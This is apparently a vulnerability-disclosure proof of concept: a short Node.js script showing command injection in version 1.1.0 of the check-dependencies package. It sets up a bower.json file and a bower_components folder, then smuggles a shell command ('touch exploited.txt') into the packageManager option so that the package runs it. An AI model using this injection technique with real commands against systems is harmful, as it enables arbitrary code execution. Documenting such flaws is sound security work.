Package check-dependencies: command injection is possible through a series of argument manipulations and by writing locally to a file and directory.

check-dependencies-1.1.0_poc.js

'use strict'

const fs = require('node:fs');
const path = require('node:path');

const cwd = process.cwd();

/*
 * Create a local 'bower.json' file so that the program flow can
 * continue within the pkg.sync call below.
 */
const filename = path.join(cwd, 'bower.json');
try {
    if ( ! fs.existsSync(filename)) {
        const bower_content = `{
    "name": "test",
    "version": "0.0.1", 
    "description": "",
    "main": "check-dependencies-1.1.0_poc.js",
    "author": "Vulnerability Detection",
    "license": "ISC",
    "dependencies": {
        "utility": "~1.6.0",
        "packagewhichdoesnotexist": "5.0.0"
    }
}`;

        let fd = fs.openSync(filename, 'w');
        console.log("[INFO] - Created: " + filename);
        fs.writeSync(fd, bower_content);
        console.log(`[INFO] - Wrote to ${filename}:\n${bower_content}`);
        fs.closeSync(fd); 
        console.log("[INFO] - Closed: " + filename);
    }
} catch(err) {
    console.error(`[ERROR] - message:\n${err}`);
}

/*
 * Create a local 'bower_components' directory so that the program flow can
 * continue within the pkg.sync call below.
 */
const bower_coms_dir = 'bower_components';
if (!fs.existsSync(bower_coms_dir)){
    fs.mkdirSync(bower_coms_dir);
}

/*
 * Require the 'check-dependencies' package and prepare the function 
 * parameters to enable program flow within pkg.sync.
 */
const pkg = require('check-dependencies');

const cfg = {
    packageManager: 'touch exploited.txt | grep ',
    packageDir: cwd,
    onlySpecified: true,
    install: true
};

const cb = function() {};

/*
 * This will end up calling child_process.spawnSync with command 
 * 'touch exploited.txt | grep install'. A local 'exploited.txt' 
 * file will be created as a result.
 */
pkg.sync(cfg, cb);